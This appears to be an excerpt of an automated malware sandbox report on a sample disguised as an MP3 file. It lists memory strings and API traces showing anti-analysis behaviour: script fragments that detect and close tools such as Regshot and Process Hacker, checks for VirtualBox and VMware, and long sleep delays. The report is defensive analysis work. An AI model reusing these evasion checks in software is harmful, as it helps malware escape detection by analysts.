                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESEQ
                Source: qwlvpmrupf.mp3, 00000007.00000002.1953687346.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001066000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950281908.0000000001073000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947262131.000000000106A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948261084.0000000001072000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEZ2
                Source: qwlvpmrupf.mp3, 00000007.00000003.1947833274.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951093785.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1953739155.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297587542.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294497605.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2300827397.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294851662.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296379791.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297015354.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")F
                Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ERE.EXEFIDDLER.EXEIDA.EX
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076809860.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079814695.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076956481.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077127799.00000000017FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES2
                Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE-
                Source: qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES7
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294497605.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294338025.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2300827397.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2294851662.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296379791.00000000013C1000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297015354.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")Z
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXE
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000008255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: OpenWith.exe, 0000000F.00000002.2945478445.0000000004EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                Source: qwlvpmrupf.mp3, 00000007.00000003.1948331020.000000000110E000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947692153.000000000110D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1954130925.0000000001110000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947430431.0000000001109000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951910362.000000000110E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXEA
                Source: qwlvpmrupf.mp3.exe, 00000010.00000002.2079423406.0000000001763000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078136333.0000000001762000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076501420.0000000001756000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2078498674.0000000001763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")O
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213103873.0000000001988000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215757310.000000000198A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENJ
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2214116379.0000000001A34000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214030847.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215974566.0000000001A38000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2216069254.0000000001A3A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2217801117.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213912161.0000000001A20000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000002.2301475753.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079472285.0000000001766000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076669694.0000000001765000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076501420.0000000001756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENH
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213298133.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213000386.0000000001994000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215658045.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2214246439.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215081504.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")+
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3API coverage: 5.7 %
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeAPI coverage: 5.4 %
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300Thread sleep count: 68 > 30
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300Thread sleep count: 191 > 30
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe TID: 3300Thread sleep count: 94 > 30
                Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B0F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00B0F826
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B21630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00B21630
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,7_2_003DE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_003DD836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003DDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_003DDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003E9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_003E9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003EA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_003EA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003EA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,7_2_003EA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003E65F1 FindFirstFileW,FindNextFileW,FindClose,7_2_003E65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003E7248 FindFirstFileW,FindClose,7_2_003E7248
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3Code function: 7_2_003E72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,7_2_003E72E9
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DFE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00DFE387
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DFD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00DFD836
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00DFDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00DFDB69
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E09F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E09F9F
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E0A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00E0A0FA
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E0A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00E0A488
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E065F1 FindFirstFileW,FindNextFileW,FindClose,16_2_00E065F1
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00E072E9
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exeCode function: 16_2_00E07248 FindFirstFileW,FindClose,16_2_00E07248
                Source: C:\Users\user\Desktop\ngPebbPhbp.exeCode function: 0_2_00B24E14 VirtualQuery,GetSystemInfo,0_2_00B24E14
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: qwlvpmrupf.mp3.exe, 00000012.00000002.2217353768.0000000001957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeT=
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296334976.00000000013F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe5FB536C7
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Thenv
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296334976.00000000013F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe(
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then_$
                Source: ngPebbPhbp.exe, 00000000.00000003.1739308660.000000000354F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: OpenWith.exe, 0000000F.00000002.2945020852.0000000003528000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2945020852.00000000035A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe59767-q*
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2296872419.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296756734.0000000001398000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206751800.0000000001394000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2297587542.00000000013A5000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then30|q
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001787000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076454608.000000000178D000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2076887703.0000000001790000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077612652.000000000179F000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077633430.00000000017A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exev
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2078297593.0000000001741000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992063073.0000000001733000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2079283835.0000000001741000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077795230.000000000173F000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2077763537.0000000001737000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Thensw
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2212858946.00000000019CD000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215199995.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2215043797.00000000019DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe|
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThengC
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2213569719.00000000019D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe3A765687Iq
                Source: qwlvpmrupf.mp3, 00000007.00000003.1946884763.000000000105D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2121860556.0000000001986000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
                Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenQy
                Source: qwlvpmrupf.mp3, 00000007.00000003.1950739253.000000000104C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1951848484.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952934549.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950894323.0000000001053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") ThenP*&
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.2076356702.0000000001750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenp21"
                Source: OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                Source: qwlvpmrupf.mp3.exe, 00000012.00000003.2216123247.000000000198D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: riveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
                Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then`y
                Source: qwlvpmrupf.mp3, 00000007.00000003.1947990948.00000000010A2000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947073721.0000000001097000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1947564822.000000000109B000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1948427869.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1950258431.00000000010B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2206906562.00000000013A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
                Source: ngPebbPhbp.exe, 00000000.00000003.1739308660.000000000354F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                Source: qwlvpmrupf.mp3, 00000007.00000003.1829676845.0000000001055000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenVy
                Source: qwlvpmrupf.mp3.exe, 00000010.00000003.1992150517.0000000001744000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenp21
                Source: qwlvpmrupf.mp3.exe, 00000013.00000003.2294257622.00000000013E9000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2296155124.00000000013FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe7>
                Source: OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
